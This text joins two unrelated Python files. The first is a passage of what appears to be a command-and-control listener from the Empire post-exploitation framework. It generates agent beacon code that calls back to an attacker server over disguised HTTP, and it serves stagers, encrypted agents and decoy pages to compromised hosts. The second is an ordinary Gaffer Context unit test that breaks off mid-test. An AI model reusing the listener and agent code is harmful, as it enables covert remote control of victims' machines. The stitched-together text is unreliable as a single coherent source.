sendMessage += " requestUri = server + taskUri\n"
# ==== ADD PARAMETERS ====
sendMessage += " parameters = {}\n"
for parameter, value in profile.post.client.parameters.items():
sendMessage += " parameters['"+parameter+"'] = '"+value+"'\n"
if profile.post.client.output.terminator.type == malleable.Terminator.PARAMETER:
sendMessage += " parameters['"+profile.post.client.output.terminator.arg+"'] = routingPacket\n"
sendMessage += " if parameters:\n"
sendMessage += " requestUri += '?' + urllib.parse.urlencode(parameters)\n"
if profile.post.client.output.terminator.type == malleable.Terminator.URIAPPEND:
sendMessage += " requestUri += routingPacket\n"
# ==== ADD BODY ====
if profile.post.client.output.terminator.type == malleable.Terminator.PRINT:
sendMessage += " body = routingPacket\n"
else:
sendMessage += " body = '"+profile.post.client.body+"'\n"
sendMessage += " try:\n body=body.encode()\n except AttributeError:\n pass\n"
# ==== BUILD REQUEST ====
sendMessage += " req = vreq(requestUri, body)\n"
sendMessage += " req.verb = '"+profile.post.client.verb+"'\n"
# ==== ADD HEADERS ====
for header, value in profile.post.client.headers.items():
sendMessage += " req.add_header('"+header+"', '"+value+"')\n"
if profile.post.client.output.terminator.type == malleable.Terminator.HEADER:
sendMessage += " req.add_header('"+profile.post.client.output.terminator.arg+"', routingPacket)\n"
# ==== BUILD GET ====
sendMessage += " else:\n"
# ==== BUILD ROUTING PACKET
sendMessage += " routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)\n"
sendMessage += "\n".join([" " + _ for _ in profile.get.client.metadata.generate_python("routingPacket").split("\n")]) + "\n"
# ==== CHOOSE URI ====
sendMessage += " taskUri = random.sample("+ str(profile.get.client.uris) +", 1)[0]\n"
sendMessage += " requestUri = server + taskUri\n"
# ==== ADD PARAMETERS ====
sendMessage += " parameters = {}\n"
for parameter, value in profile.get.client.parameters.items():
sendMessage += " parameters['"+parameter+"'] = '"+value+"'\n"
if profile.get.client.metadata.terminator.type == malleable.Terminator.PARAMETER:
sendMessage += " parameters['"+profile.get.client.metadata.terminator.arg+"'] = routingPacket\n"
sendMessage += " if parameters:\n"
sendMessage += " requestUri += '?' + urllib.parse.urlencode(parameters)\n"
if profile.get.client.metadata.terminator.type == malleable.Terminator.URIAPPEND:
sendMessage += " requestUri += routingPacket\n"
# ==== ADD BODY ====
if profile.get.client.metadata.terminator.type == malleable.Terminator.PRINT:
sendMessage += " body = routingPacket\n"
else:
sendMessage += " body = '"+profile.get.client.body+"'\n"
sendMessage += " try:\n body=body.encode()\n except AttributeError:\n pass\n"
# ==== BUILD REQUEST ====
sendMessage += " req = vreq(requestUri, body)\n"
sendMessage += " req.verb = '"+profile.get.client.verb+"'\n"
# ==== ADD HEADERS ====
for header, value in profile.get.client.headers.items():
sendMessage += " req.add_header('"+header+"', '"+value+"')\n"
if profile.get.client.metadata.terminator.type == malleable.Terminator.HEADER:
sendMessage += " req.add_header('"+profile.get.client.metadata.terminator.arg+"', routingPacket)\n"
# ==== SEND REQUEST ====
sendMessage += " try:\n"
sendMessage += " res = urllib.request.urlopen(req)\n"
# ==== EXTRACT RESPONSE ====
if profile.get.server.output.terminator.type == malleable.Terminator.HEADER:
header = profile.get.server.output.terminator.arg
sendMessage += " data = res.info().dict['"+header+"'] if '"+header+"' in res.info().dict else ''\n"
sendMessage += " data = urllib.parse.unquote(data)\n"
elif profile.get.server.output.terminator.type == malleable.Terminator.PRINT:
sendMessage += " data = res.read()\n"
# ==== DECODE RESPONSE ====
sendMessage += "\n".join([" " + _ for _ in profile.get.server.output.generate_python_r("data").split("\n")]) + "\n"
# before return we encode to bytes, since in some transformations "join" produces str
sendMessage += " if isinstance(data,str): data = data.encode('latin-1')\n"
sendMessage += " return ('200', data)\n"
# ==== HANDLE ERROR ====
sendMessage += " except urllib.request.HTTPError as HTTPError:\n"
sendMessage += " missedCheckins += 1\n"
sendMessage += " if HTTPError.code == 401:\n"
sendMessage += " sys.exit(0)\n"
sendMessage += " return (HTTPError.code, '')\n"
sendMessage += " except urllib.request.URLError as URLError:\n"
sendMessage += " missedCheckins += 1\n"
sendMessage += " return (URLError.reason, '')\n"
sendMessage += " return ('', '')\n"
return updateServers + sendMessage
else:
print(helpers.color("[!] listeners/template generate_comms(): invalid language specification, only 'powershell' and 'python' are current supported for this module."))
else:
print(helpers.color('[!] listeners/template generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
    """
    Threaded function that actually starts up the Flask server.

    Builds a Flask app whose catch-all route services every agent request
    (stage negotiation, tasking retrieval, result posting) according to the
    deserialized malleable C2 profile, then runs the app over HTTP or HTTPS
    depending on the configured Host value.
    """
    # make a copy of the currently set listener options for later stager/agent generation
    listenerOptions = copy.deepcopy(listenerOptions)

    # extract the set options for this instantiated listener
    bindIP = listenerOptions['BindIP']['Value']
    port = listenerOptions['Port']['Value']
    host = listenerOptions['Host']['Value']
    stagingKey = listenerOptions['StagingKey']['Value']
    listenerName = listenerOptions['Name']['Value']
    proxy = listenerOptions['Proxy']['Value']          # NOTE(review): unused here; kept for parity with sibling listeners
    proxyCreds = listenerOptions['ProxyCreds']['Value']  # NOTE(review): unused here; kept for parity with sibling listeners
    certPath = listenerOptions['CertPath']['Value']

    # build and validate profile
    profile = malleable.Profile._deserialize(listenerOptions["ProfileSerialized"]["Value"])
    profile.validate()

    # suppress the normal Flask output
    log = logging.getLogger('werkzeug')
    log.setLevel(logging.ERROR)

    # initialize flask server
    app = Flask(__name__)
    self.app = app

    @app.route('/', methods=["GET", "POST"])
    @app.route('/<path:request_uri>', methods=["GET", "POST"])
    def handle_request(request_uri="", tempListenerOptions=None):
        """
        Handle an agent request: identify the profile implementation by URI,
        extract agent data, hand it to the agent handler, and build the
        malleable (or hard-coded staging) response.
        """
        data = request.get_data()
        clientIP = request.remote_addr
        url = request.url
        method = request.method
        headers = request.headers
        # re-deserialize on each request so live option edits take effect
        profile = malleable.Profile._deserialize(self.options["ProfileSerialized"]["Value"])

        # log request
        listenerName = self.options['Name']['Value']
        message = "[*] {} request for {}/{} from {} ({} bytes)".format(request.method.upper(), request.host, request_uri, clientIP, len(request.data))
        signal = json.dumps({
            'print': False,
            'message': message
        })
        dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))

        try:
            # build malleable request from flask request
            malleableRequest = malleable.MalleableRequest()
            malleableRequest.url = url
            malleableRequest.verb = method
            malleableRequest.headers = headers
            malleableRequest.body = data

            # fix non-ascii characters
            if '%' in malleableRequest.path:
                malleableRequest.path = urllib.parse.unquote(malleableRequest.path)

            # identify the implementation by uri (longest prefix wins, hence reverse-sorted by length)
            implementation = None
            for uri in sorted((profile.stager.client.uris if profile.stager.client.uris else ["/"]) + (profile.get.client.uris if profile.get.client.uris else ["/"]) + (profile.post.client.uris if profile.post.client.uris else ["/"]), key=len, reverse=True):
                if request_uri.startswith(uri.lstrip("/")):
                    # match!
                    for imp in [profile.stager, profile.get, profile.post]:
                        if uri in (imp.client.uris if imp.client.uris else ["/"]):
                            implementation = imp
                            break
                if implementation:
                    break

            # attempt to extract information from the request
            if implementation:
                agentInfo = None
                if implementation is profile.stager and request.method == "POST":
                    # stage 1 negotiation comms are hard coded, so we can't use malleable
                    agentInfo = malleableRequest.body
                elif implementation is profile.post:
                    # the post implementation has two spots for data, requires two-part extraction
                    agentInfo, output = implementation.extract_client(malleableRequest)
                    agentInfo = (agentInfo if agentInfo else b"") + (output if output else b"")
                else:
                    agentInfo = implementation.extract_client(malleableRequest)

                if agentInfo:
                    dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, agentInfo, listenerOptions, clientIP)
                    if dataResults and len(dataResults) > 0:
                        for (language, results) in dataResults:
                            if results:
                                if isinstance(results, str):
                                    results = results.encode("latin-1")
                                if results == b'STAGE0':
                                    # step 2 of negotiation -> server returns stager (stage 1)

                                    # log event
                                    message = "[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
                                    signal = json.dumps({
                                        'print': True,
                                        'message': message
                                    })
                                    dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))

                                    # build stager (stage 1)
                                    stager = self.generate_stager(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)

                                    # build malleable response with stager (stage 1)
                                    malleableResponse = implementation.construct_server(stager)
                                    return Response(malleableResponse.body, malleableResponse.code, malleableResponse.headers)

                                elif results.startswith(b'STAGE2'):
                                    # step 6 of negotiation -> server sends patched agent (stage 2)
                                    if ':' in clientIP:
                                        # bracket IPv6 addresses for display
                                        clientIP = '[' + clientIP + ']'
                                    sessionID = results.split(b' ')[1].strip().decode('UTF-8')
                                    sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']

                                    # log event
                                    message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
                                    signal = json.dumps({
                                        'print': True,
                                        'message': message
                                    })
                                    dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))

                                    # TODO: handle this with malleable??
                                    tempListenerOptions = None
                                    if "Hop-Name" in request.headers:
                                        hopListenerName = request.headers.get('Hop-Name')
                                        if hopListenerName:
                                            try:
                                                hopListener = data_util.get_listener_options(hopListenerName)
                                                tempListenerOptions = copy.deepcopy(listenerOptions)
                                                tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
                                            except TypeError:
                                                tempListenerOptions = listenerOptions

                                    session_info = Session().query(models.Agent).filter(
                                        models.Agent.session_id == sessionID).first()
                                    if session_info.language == 'ironpython':
                                        version = 'ironpython'
                                    else:
                                        version = ''

                                    # generate agent
                                    agentCode = self.generate_agent(language=language,
                                                                    listenerOptions=(tempListenerOptions if tempListenerOptions else listenerOptions),
                                                                    obfuscate=self.mainMenu.obfuscate,
                                                                    obfuscationCommand=self.mainMenu.obfuscateCommand,
                                                                    version=version)
                                    encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)

                                    # build malleable response with agent
                                    # note: stage1 comms are hard coded, can't use malleable here.
                                    return Response(encryptedAgent, 200, implementation.server.headers)

                                elif results.startswith(b'ERROR:'):
                                    # error parsing agent data
                                    # NOTE: checked before the generic error match below, which would
                                    # otherwise shadow this branch (it matches any b'error' prefix
                                    # case-insensitively) and make restaging unreachable.
                                    message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(request_uri, clientIP, results)
                                    signal = json.dumps({
                                        'print': True,
                                        'message': message
                                    })
                                    dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))
                                    if b'not in cache' in results:
                                        # signal the client to restage
                                        print(helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)))
                                        return make_response("", 401)
                                    return Response(self.default_response(), 404)

                                elif results[:10].lower().startswith(b'error') or results[:10].lower().startswith(b'exception'):
                                    # agent returned an error
                                    message = "[!] Error returned for results by {} : {}".format(clientIP, results)
                                    signal = json.dumps({
                                        'print': True,
                                        'message': message
                                    })
                                    dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))
                                    return Response(self.default_response(), 404)

                                elif results == b'VALID':
                                    # agent posted results
                                    message = "[*] Valid results returned by {}".format(clientIP)
                                    signal = json.dumps({
                                        'print': False,
                                        'message': message
                                    })
                                    # sender fixed: was "listeners/http/" while every other dispatch
                                    # in this listener uses "listeners/http_malleable/"
                                    dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))

                                    # build malleable response with no results
                                    malleableResponse = implementation.construct_server("")
                                    return Response(malleableResponse.body, malleableResponse.code, malleableResponse.headers)

                                else:
                                    # fixed: request.method is a str in Flask; the original compared
                                    # against b"POST", which is always False in Python 3.
                                    if request.method == "POST":
                                        # step 4 of negotiation -> server returns RSA(nonce+AESsession))

                                        # log event
                                        message = "[*] Sending session key to {}".format(clientIP)
                                        signal = json.dumps({
                                            'print': True,
                                            'message': message
                                        })
                                        dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))

                                        # note: stage 1 negotiation comms are hard coded, so we can't use malleable
                                        return Response(results, 200, implementation.server.headers)
                                    else:
                                        # agent requested taskings
                                        message = "[*] Agent from {} retrieved taskings".format(clientIP)
                                        signal = json.dumps({
                                            'print': False,
                                            'message': message
                                        })
                                        dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))

                                        # build malleable response with results
                                        malleableResponse = implementation.construct_server(results)
                                        if isinstance(malleableResponse.body, str):
                                            malleableResponse.body = malleableResponse.body.encode('latin-1')
                                        return Response(malleableResponse.body, malleableResponse.code, malleableResponse.headers)
                            else:
                                # no tasking for agent
                                message = "[*] Agent from {} retrieved taskings".format(clientIP)
                                signal = json.dumps({
                                    'print': False,
                                    'message': message
                                })
                                dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))

                                # build malleable response with no results
                                malleableResponse = implementation.construct_server(results)
                                return Response(malleableResponse.body, malleableResponse.code, malleableResponse.headers)
                else:
                    # log error parsing routing packet
                    message = "[!] Error parsing routing packet from {}: {}.".format(clientIP, str(agentInfo))
                    signal = json.dumps({
                        'print': True,
                        'message': message
                    })
                    dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))

                # log invalid request
                message = "[!] /{} requested by {} with no routing packet.".format(request_uri, clientIP)
                signal = json.dumps({
                    'print': True,
                    'message': message
                })
                dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))

            else:
                # log invalid uri
                message = "[!] unknown uri /{} requested by {}.".format(request_uri, clientIP)
                signal = json.dumps({
                    'print': True,
                    'message': message
                })
                dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))

        except malleable.MalleableError as e:
            # probably an issue with the malleable library, please report it :)
            message = "[!] Malleable had trouble handling a request for /{} by {}: {}.".format(request_uri, clientIP, str(e))
            signal = json.dumps({
                'print': True,
                'message': message
            })
            # fixed: the signal was built but never dispatched in the original
            dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))

        # fall-through for every non-returning path: serve the default (decoy) page
        return Response(self.default_response(), 200)

    try:
        if host.startswith('https'):
            if certPath.strip() == '' or not os.path.isdir(certPath):
                print(helpers.color("[!] Unable to find certpath %s, using default." % certPath))
                certPath = "setup"
            certPath = os.path.abspath(certPath)
            pyversion = sys.version_info

            # support any version of tls
            if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
                proto = ssl.PROTOCOL_TLS
            elif pyversion[0] >= 3:
                proto = ssl.PROTOCOL_TLS
            else:
                proto = ssl.PROTOCOL_SSLv23

            context = ssl.SSLContext(proto)
            context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
            app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
        else:
            app.run(host=bindIP, port=int(port), threaded=True)
    except Exception as e:
        print(helpers.color("[!] Listener startup on port %s failed - %s: %s" % (port, e.__class__.__name__, str(e))))
        message = "[!] Listener startup on port {} failed - {}: {}".format(port, e.__class__.__name__, str(e))
        signal = json.dumps({
            'print': True,
            'message': message
        })
        dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))
def start(self, name=''):
    """
    Start a threaded instance of self.start_server() and store it in
    the self.threads dictionary keyed by the listener name.

    Returns True if the listener thread is still alive one second after
    starting (i.e. startup did not immediately fail), False otherwise.
    """
    listenerOptions = self.options
    # both branches of the original did exactly the same work; the only
    # difference was where the thread-dictionary key came from.
    if not name:
        name = listenerOptions['Name']['Value']
    self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
    self.threads[name].start()
    time.sleep(1)
    # returns True if the listener successfully started, false otherwise
    return self.threads[name].is_alive()
def shutdown(self, name=''):
    """
    Terminates the server thread stored in the self.threads dictionary,
    keyed by the listener name (defaults to this listener's own name).
    """
    # collapse the duplicated print/kill branches: default the key first.
    if not name:
        name = self.options['Name']['Value']
    print(helpers.color("[!] Killing listener '%s'" % (name)))
    self.threads[name].kill()
def generate_cookie(self):
    """
    Generate a random cookie value: 6 to 16 ASCII letters.
    """
    length = random.randint(6, 16)
    return helpers.random_string(length, charset=string.ascii_letters)
|
ContextTest.py | ##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import weakref
import imath
import IECore
import Gaffer
import GafferTest
class ContextTest( GafferTest.TestCase ) :
    """Tests for Gaffer.Context : variable storage and the changed signal,
    the thread-specific "current" context, copying/ownership semantics,
    string substitutions and hashing.

    Modernized for Python 3 : the deprecated unittest aliases
    failUnless/failIf (removed in Python 3.12) are replaced with
    assertTrue/assertFalse, and the Python-2-only `basestring` check
    now uses `str`.
    """

    def testFrameAccess( self ) :

        c = Gaffer.Context()

        self.assertEqual( c.getFrame(), 1.0 )
        self.assertEqual( c["frame"], 1.0 )

        c.setFrame( 10.5 )
        self.assertEqual( c.getFrame(), 10.5 )
        self.assertEqual( c["frame"], 10.5 )

    def testChangedSignal( self ) :

        c = Gaffer.Context()

        changes = []
        def f( context, name ) :
            # the signal must fire for the context it was connected to
            self.assertTrue( context.isSame( c ) )
            changes.append( ( name, context.get( name, None ) ) )

        # keep the connection object alive for the duration of the test
        cn = c.changedSignal().connect( f )

        c["a"] = 2
        self.assertEqual( changes, [ ( "a", 2 ) ] )

        c["a"] = 3
        self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ) ] )

        c["b"] = 1
        self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ), ( "b", 1 ) ] )

        # when an assignment makes no actual change, the signal should not
        # be triggered again.
        c["b"] = 1
        self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ), ( "b", 1 ) ] )

        # Removing variables should also trigger the changed signal.
        del changes[:]

        c.remove( "a" )
        self.assertEqual( changes, [ ( "a", None ) ] )

        del c["b"]
        self.assertEqual( changes, [ ( "a", None ), ( "b", None ) ] )

    def testTypes( self ) :

        c = Gaffer.Context()

        c["int"] = 1
        self.assertEqual( c["int"], 1 )
        self.assertEqual( c.get( "int" ), 1 )
        c.set( "int", 2 )
        self.assertEqual( c["int"], 2 )
        self.assertTrue( isinstance( c["int"], int ) )

        c["float"] = 1.0
        self.assertEqual( c["float"], 1.0 )
        self.assertEqual( c.get( "float" ), 1.0 )
        c.set( "float", 2.0 )
        self.assertEqual( c["float"], 2.0 )
        self.assertTrue( isinstance( c["float"], float ) )

        c["string"] = "hi"
        self.assertEqual( c["string"], "hi" )
        self.assertEqual( c.get( "string" ), "hi" )
        c.set( "string", "bye" )
        self.assertEqual( c["string"], "bye" )
        # `str` here was `basestring` (Python 2 only)
        self.assertTrue( isinstance( c["string"], str ) )

        c["v2i"] = imath.V2i( 1, 2 )
        self.assertEqual( c["v2i"], imath.V2i( 1, 2 ) )
        self.assertEqual( c.get( "v2i" ), imath.V2i( 1, 2 ) )
        c.set( "v2i", imath.V2i( 1, 2 ) )
        self.assertEqual( c["v2i"], imath.V2i( 1, 2 ) )
        self.assertTrue( isinstance( c["v2i"], imath.V2i ) )

        c["v3i"] = imath.V3i( 1, 2, 3 )
        self.assertEqual( c["v3i"], imath.V3i( 1, 2, 3 ) )
        self.assertEqual( c.get( "v3i" ), imath.V3i( 1, 2, 3 ) )
        c.set( "v3i", imath.V3i( 1, 2, 3 ) )
        self.assertEqual( c["v3i"], imath.V3i( 1, 2, 3 ) )
        self.assertTrue( isinstance( c["v3i"], imath.V3i ) )

        c["v2f"] = imath.V2f( 1, 2 )
        self.assertEqual( c["v2f"], imath.V2f( 1, 2 ) )
        self.assertEqual( c.get( "v2f" ), imath.V2f( 1, 2 ) )
        c.set( "v2f", imath.V2f( 1, 2 ) )
        self.assertEqual( c["v2f"], imath.V2f( 1, 2 ) )
        self.assertTrue( isinstance( c["v2f"], imath.V2f ) )

        c["v3f"] = imath.V3f( 1, 2, 3 )
        self.assertEqual( c["v3f"], imath.V3f( 1, 2, 3 ) )
        self.assertEqual( c.get( "v3f" ), imath.V3f( 1, 2, 3 ) )
        c.set( "v3f", imath.V3f( 1, 2, 3 ) )
        self.assertEqual( c["v3f"], imath.V3f( 1, 2, 3 ) )
        self.assertTrue( isinstance( c["v3f"], imath.V3f ) )

    def testCopying( self ) :

        c = Gaffer.Context()
        c["i"] = 10

        c2 = Gaffer.Context( c )
        self.assertEqual( c2["i"], 10 )

        c["i"] = 1
        self.assertEqual( c["i"], 1 )
        self.assertEqual( c2["i"], 10 )

    def testEquality( self ) :

        c = Gaffer.Context()
        c2 = Gaffer.Context()

        self.assertEqual( c, c2 )
        self.assertFalse( c != c2 )

        c["somethingElse"] = 1

        self.assertNotEqual( c, c2 )
        self.assertFalse( c == c2 )

    def testCurrent( self ) :

        # if nothing has been made current then there should be a default
        # constructed context in place.
        c = Gaffer.Context.current()
        c2 = Gaffer.Context()
        self.assertEqual( c, c2 )

        # and we should be able to change that using the with statement
        c2["something"] = 1
        with c2 :

            self.assertTrue( Gaffer.Context.current().isSame( c2 ) )
            self.assertEqual( Gaffer.Context.current()["something"], 1 )

        # and bounce back to the original
        self.assertTrue( Gaffer.Context.current().isSame( c ) )

    def testCurrentIsThreadSpecific( self ) :

        c = Gaffer.Context()
        self.assertFalse( c.isSame( Gaffer.Context.current() ) )

        def f() :
            # another thread must not see this thread's current context
            self.assertFalse( c.isSame( Gaffer.Context.current() ) )
            with Gaffer.Context() :
                pass

        with c :

            self.assertTrue( c.isSame( Gaffer.Context.current() ) )

            t = threading.Thread( target = f )
            t.start()
            t.join()

            self.assertTrue( c.isSame( Gaffer.Context.current() ) )

        self.assertFalse( c.isSame( Gaffer.Context.current() ) )

    def testThreading( self ) :

        # for good measure, run testCurrent() in a load of threads at
        # the same time.

        threads = []
        for i in range( 0, 1000 ) :
            t = threading.Thread( target = self.testCurrent )
            t.start()
            threads.append( t )

        for t in threads :
            t.join()

    def testSetWithObject( self ) :

        c = Gaffer.Context()

        v = IECore.StringVectorData( [ "a", "b", "c" ] )
        c.set( "v", v )

        self.assertEqual( c.get( "v" ), v )
        self.assertFalse( c.get( "v" ).isSame( v ) )

        self.assertEqual( c["v"], v )
        self.assertFalse( c["v"].isSame( v ) )

    def testGetWithDefault( self ) :

        c = Gaffer.Context()
        self.assertRaises( RuntimeError, c.get, "f" )
        self.assertEqual( c.get( "f", 10 ), 10 )
        c["f"] = 1.0
        self.assertEqual( c.get( "f" ), 1.0 )

    def testReentrancy( self ) :

        c = Gaffer.Context()
        with c :
            self.assertTrue( c.isSame( Gaffer.Context.current() ) )
            with c :
                self.assertTrue( c.isSame( Gaffer.Context.current() ) )

    def testLifeTime( self ) :

        c = Gaffer.Context()
        w = weakref.ref( c )
        self.assertTrue( w() is c )

        with c :
            pass

        del c

        self.assertTrue( w() is None )

    def testWithBlockReturnValue( self ) :

        with Gaffer.Context() as c :
            self.assertTrue( isinstance( c, Gaffer.Context ) )
            self.assertTrue( c.isSame( Gaffer.Context.current() ) )

    def testSubstitute( self ) :

        c = Gaffer.Context()
        c.setFrame( 20 )
        c["a"] = "apple"
        c["b"] = "bear"

        self.assertEqual( c.substitute( "$a/$b/something.###.tif" ), "apple/bear/something.020.tif" )
        self.assertEqual( c.substitute( "$a/$dontExist/something.###.tif" ), "apple//something.020.tif" )
        self.assertEqual( c.substitute( "${badlyFormed" ), "" )

    def testSubstituteTildeInMiddle( self ) :

        c = Gaffer.Context()
        self.assertEqual( c.substitute( "a~b" ), "a~b" )

    def testSubstituteWithMask( self ) :

        c = Gaffer.Context()
        c.setFrame( 20 )
        c["a"] = "apple"
        c["b"] = "bear"

        self.assertEqual( c.substitute( "~", c.Substitutions.AllSubstitutions & ~c.Substitutions.TildeSubstitutions ), "~" )
        self.assertEqual( c.substitute( "#", c.Substitutions.AllSubstitutions & ~c.Substitutions.FrameSubstitutions ), "#" )
        self.assertEqual( c.substitute( "$a/${b}", c.Substitutions.AllSubstitutions & ~c.Substitutions.VariableSubstitutions ), "$a/${b}" )
        self.assertEqual( c.substitute( "\\", c.Substitutions.AllSubstitutions & ~c.Substitutions.EscapeSubstitutions ), "\\" )
        self.assertEqual( c.substitute( "\\$a", c.Substitutions.AllSubstitutions & ~c.Substitutions.EscapeSubstitutions ), "\\apple" )
        self.assertEqual( c.substitute( "#${a}", c.Substitutions.AllSubstitutions & ~c.Substitutions.FrameSubstitutions ), "#apple" )
        self.assertEqual( c.substitute( "#${a}", c.Substitutions.NoSubstitutions ), "#${a}" )

    def testFrameAndVariableSubstitutionsAreDifferent( self ) :

        c = Gaffer.Context()
        c.setFrame( 3 )

        # Turning off variable substitutions should have no effect on '#' substitutions.
        self.assertEqual( c.substitute( "###.$frame" ), "003.3" )
        self.assertEqual( c.substitute( "###.$frame", c.Substitutions.AllSubstitutions & ~c.Substitutions.VariableSubstitutions ), "003.$frame" )

        # Turning off '#' substitutions should have no effect on variable substitutions.
        self.assertEqual( c.substitute( "###.$frame" ), "003.3" )
        self.assertEqual( c.substitute( "###.$frame", c.Substitutions.AllSubstitutions & ~c.Substitutions.FrameSubstitutions ), "###.3" )

    def testSubstitutions( self ) :

        # substitutions() is a static method, so the class itself is enough
        c = Gaffer.Context

        self.assertEqual( c.substitutions( "a"), c.Substitutions.NoSubstitutions )
        self.assertEqual( c.substitutions( "~/something"), c.Substitutions.TildeSubstitutions )
        self.assertEqual( c.substitutions( "$a"), c.Substitutions.VariableSubstitutions )
        self.assertEqual( c.substitutions( "${a}"), c.Substitutions.VariableSubstitutions )
        self.assertEqual( c.substitutions( "###"), c.Substitutions.FrameSubstitutions )
        self.assertEqual( c.substitutions( "\#"), c.Substitutions.EscapeSubstitutions )
        self.assertEqual( c.substitutions( "${a}.###"), c.Substitutions.VariableSubstitutions | c.Substitutions.FrameSubstitutions )

    def testHasSubstitutions( self ) :

        c = Gaffer.Context()
        self.assertFalse( c.hasSubstitutions( "a" ) )
        self.assertTrue( c.hasSubstitutions( "~something" ) )
        self.assertTrue( c.hasSubstitutions( "$a" ) )
        self.assertTrue( c.hasSubstitutions( "${a}" ) )
        self.assertTrue( c.hasSubstitutions( "###" ) )

    def testNames( self ) :

        c = Gaffer.Context()
        self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond" ] ) )

        c["a"] = 10
        self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )

        cc = Gaffer.Context( c )
        self.assertEqual( set( cc.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )

        cc["b"] = 20
        self.assertEqual( set( cc.names() ), set( [ "frame", "framesPerSecond", "a", "b" ] ) )
        self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )

        self.assertEqual( cc.names(), cc.keys() )

    def testManyContexts( self ) :

        GafferTest.testManyContexts()

    def testGetWithAndWithoutCopying( self ) :

        c = Gaffer.Context()
        c["test"] = IECore.IntVectorData( [ 1, 2 ] )

        # we should be getting a copy each time by default
        self.assertFalse( c["test"].isSame( c["test"] ) )
        # meaning that if we modify the returned value, no harm is done
        c["test"].append( 10 )
        self.assertEqual( c["test"], IECore.IntVectorData( [ 1, 2 ] ) )

        # if we ask nicely, we can get a reference to the internal
        # value without any copying.
        self.assertTrue( c.get( "test", _copy=False ).isSame( c.get( "test", _copy=False ) ) )
        # but then if we modify the returned value, we are changing the
        # context itself too. this should be avoided - we're just doing it
        # here to test that we are indeed referencing the internal value.
        c.get( "test", _copy=False ).append( 10 )
        self.assertEqual( c["test"], IECore.IntVectorData( [ 1, 2, 10 ] ) )

    def testGetWithDefaultAndCopyArgs( self ) :

        c = Gaffer.Context()
        c["test"] = IECore.IntVectorData( [ 1, 2 ] )

        self.assertTrue( c.get( "test", 10, _copy=False ).isSame( c.get( "test", 20, _copy=False ) ) )
        self.assertTrue( c.get( "test", defaultValue=10, _copy=False ).isSame( c.get( "test", defaultValue=20, _copy=False ) ) )

    def testCopyWithSharedOwnership( self ) :

        c1 = Gaffer.Context()

        c1["testInt"] = 10
        c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )

        self.assertEqual( c1["testInt"], 10 )
        self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )

        r = c1.get( "testIntVector", _copy=False ).refCount()

        c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )

        self.assertEqual( c2["testInt"], 10 )
        self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )

        c1["testInt"] = 20
        self.assertEqual( c1["testInt"], 20 )

